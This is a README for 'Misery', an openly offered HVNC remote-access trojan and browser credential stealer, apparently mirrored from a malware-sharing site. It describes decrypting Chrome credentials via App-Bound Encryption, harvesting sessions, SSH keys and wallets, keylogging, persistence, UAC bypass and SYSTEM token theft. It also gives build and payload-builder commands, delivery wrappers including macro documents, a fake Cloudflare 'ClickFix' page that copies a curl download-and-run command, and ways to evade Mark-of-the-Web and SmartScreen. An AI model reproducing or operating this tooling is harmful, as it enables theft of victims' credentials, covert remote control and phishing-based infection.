Misery + HVNC

Misery
a devoted sister of the Church of Malware

An HVNC RAT and stealer, derived from the 2023-era Creal stealer and rebuilt for Chrome's App-Bound Encryption. Chrome 127+ moved credential decryption behind ABE, a COM service running as the browser user. The agent walks that COM object in-process via indirect syscalls, so nothing credential-shaped ever touches disk. ABE research is all xaitax. Local testing and research only.

Demo

Misery demo

Features

  • Hidden desktop (hvnc start): GDI apps on a hidden desktop, streamed live
  • Interactive browser (hvnc launch chrome): real Chromium with the victim's logins, driven over CDP
  • Ghosted browser (ghost <url>): hidden Chrome/Edge session using the victim's cookies and logins
  • Credential harvesting: Chrome, Edge, Brave, Opera, Opera GX, Firefox
  • App-session harvesting: payment cards, Discord, Steam, Telegram, Slack, VS Code, AWS, SSH keys, Wi-Fi passwords, wallet extension paths, Signal session listing
  • Encrypted C2 channel: reverse TCP (default) or HTTPS beaconing through a CDN
  • Payload builder (setup.py): msfvenom-style config, ECDH key handling, and -p delivery wrappers for docm, xlsm, lnk, pdf, html, clickfix_html, iso, polyglot_exe_zip, and polyglot_html
  • Keylogger and clipboard monitoring
  • Persistence: HKCU Run key and WMI event subscriptions
  • Elevation (elevate): silent UAC bypass to High, then SYSTEM via SeDebug token theft
  • Anti-analysis: user-mode environment checks, reflective injection

How it works

  • Channel: the console holds the private half of an ECDH P-256 keypair in .misery_key; the agent only ever ships the public half. Every session derives a fresh AES-256-GCM key from the handshake, so no key material repeats across bots.
  • Stealing: spawn a suspended Chrome or Edge, inject the payload DLL in-process, and walk the ABE COM object to decrypt the stored credentials. No disk write, and the browser never visibly opens.
  • HVNC: hvnc start runs GDI apps on a hidden desktop and streams frames to the operator view. ghost <url> drives a real Chromium over CDP, logged into the victim's profiles; the browser is basically them.
  • Elevation: relaunch as admin via PEB masquerade and CMSTPLUA/ICMLuaUtil, then SYSTEM through SeDebug token theft from a non-PPL process.
  • Delivery: setup.py -p wraps the agent into 9 file formats; only the stage URL and agent filename are injected at build time.

Tested On

Target Version
Google Chrome 150.0.7871.187
Microsoft Edge 151.0.4129.59
Elevation chain Windows 11 25H2 (build 26200)

Misery operator view

VirusTotal

VirusTotal scan result

Quick start

setup.py writes src/config.h, saves the console's ECDH key to .misery_key, and builds the project:

python setup.py -g                                        # interactive
python setup.py -t tcp LHOST=127.0.0.1 LPORT=4444 -o agent   # non-interactive

Run the console listener, then the agent:

.\build\console.exe
.\build\agent.exe

Type help in the console for the full command list.

Payload wrappers

The builder (setup.py -p <formats>) packages the agent into delivery filetypes in dist/ and records each one in <out>.manifest.json with its sha256 and size. python setup.py --list-formats prints the current list with dependencies.

  • docm - Word macro document; Document_Open shells a hidden cmd/curl download-and-run from a compiled base (wrappers_bases/docm_base.docm)
  • xlsm - Excel macro workbook; Workbook_Open shells the same chain from a compiled base (wrappers_bases/xlsm_base.xlsm); runtime values live in a hidden cfg sheet
  • lnk - shortcut plus companion .cmd; the LNK probes Downloads/Desktop for the .cmd, which opens a decoy PDF then fetches and runs the agent (the chain lives in the .cmd because Defender's FastPath flags any LNK-launched curl download cmdline)
  • pdf - agent embedded as a PDF attachment, launched on open
  • html - OneDrive-style page; the agent hides in a zip blob behind a button click
  • clickfix_html - fake Cloudflare "Verify you are human" page; checking the box copies a cmd/curl download-and-run command to the clipboard and shows the Win+R / Ctrl+V / Enter steps
  • iso - ISO with the agent inside, sidesteps MOTW
  • polyglot_exe_zip - runs as an exe, opens as a zip holding a document.pdf.lnk and its companion .cmd
  • polyglot_html - runs as an exe, shows a decoy page in a browser
python setup.py -t tcp LHOST=127.0.0.1 LPORT=4444 -p docm,iso -o misery STAGE_URL=http://127.0.0.1:8080/misery.exe

-p all builds every format. The macro, lnk, clickfix, and polyglot_exe_zip formats fetch the agent from STAGE_URL when the target opens them; pdf, html, iso, and polyglot_html carry the agent themselves. The macro files ship with decoy content, and the lnk/pdf formats show a decoy document, so they read as normal business documents instead of empty templates.

The docm/xlsm wrappers copy the Office-compiled base (wrappers_bases/), fill decoy content, and inject per-build values — Word docvars in word/settings.xml, Excel cfg-sheet cells in xl/sharedStrings.xml — so the pre-compiled VBA assembles the download chain at open time without rewriting any macro stream. They're compiled by Office itself because pyopenvba-style rebuilds leave the auto-events unhooked (root-caused live 2026-08).

The lnk and polyglot_exe_zip fetch their decoy PDF from the same directory as STAGE_URL, so host the generated <out>.cmd and <out>.decoy.pdf next to the agent.

Delivery note: browsers tag downloaded files with the Mark-of-the-Web (Zone.Identifier), which trips SmartScreen on macros and executables. Extract a container with 7-Zip or WinRAR to drop the MOTW (Explorer itself propagates it), so the iso wrapper or archiver extraction is the practical route for the macro and exe formats; the pdf and html formats are fine to serve straight from a browser.

The wrappers use these optional libs; a missing lib just skips the formats that need it:

pip install pylnk3 pycdlib pikepdf python-docx openpyxl

The docm/xlsm bases live in wrappers_bases/ and ship with the repo; rebuild them in Office if you ever change the macro logic (see the wrapper docstring notes), then commit the new base.

Commands

Command What it does
bot list bots; bot <id> targets one, bot all broadcasts
steal run credential and session harvesting
loot dump the last steal result JSON raw to the terminal
elevate [system] relaunch the agent as admin; system chains to SYSTEM
hvnc start / hvnc stop start or stop the hidden desktop session
hvnc launch [path] launch an app (default Chrome) on the hidden desktop
hvnc quality [10-100] set streamed frame JPEG quality
ghost <url> open a URL in a ghosted hidden browser
ghost nav <url> navigate the ghost browser
ghost stop stop the ghost session
keylog toggle the keylogger
clip read the victim's clipboard
shell / ps <cmd> run a hidden PowerShell one-liner on the agent
history show command history
clear / exit clear the terminal / quit

Build

Requires cmake and a C++ toolchain (MSVC, MinGW, or Clang).

MSVC:

cmake -S . -B build -G "Visual Studio 17 2022" -A x64
cmake --build build --config Release

MinGW:

cmake -S . -B build -G "MinGW Makefiles" -DCMAKE_BUILD_TYPE=Release
cmake --build build -j 4

A fresh checkout builds against 127.0.0.1:4444. Run setup.py once so .misery_key exists.

Layout

  • src/agent: entry, C2 client, injector, persistence
  • src/console: operator console + listener
  • src/payload: payload DLL, reflective loader, trampoline
  • src/stealer: Misery-derived sources
  • src/hvnc: hidden-desktop session
  • src/ghost: ghosted browser session
  • src/browser: CDP client (Page/Input over WebSocket)
  • src/rat: keylogger + clipboard
  • src/transport: encrypted TCP framing, HTTPS beacon carrier, compression
  • src/evasion: indirect syscalls, anti-analysis, UAC/token elevation, helpers
  • wrappers_bases/: Office-authored compiled macro bases used by the docm/xlsm wrappers
  • build/: out-of-source build dir

Love all you killas. Stay sharp. ♱

If you save passwords in a browser, stop: use a password manager, keep work infra on dedicated logins, and disable sites saving data. Wipe cookies on exit.

Licence

No licence granted. Research code for study only; not licensed for redistribution or commercial use.

S
Description
Automated archival mirror of churchofmalware.org/JYenn/Misery
Readme
19 MiB
Languages
C++ 87.5%
Python 10.5%
CMake 0.9%
Assembly 0.8%
C 0.3%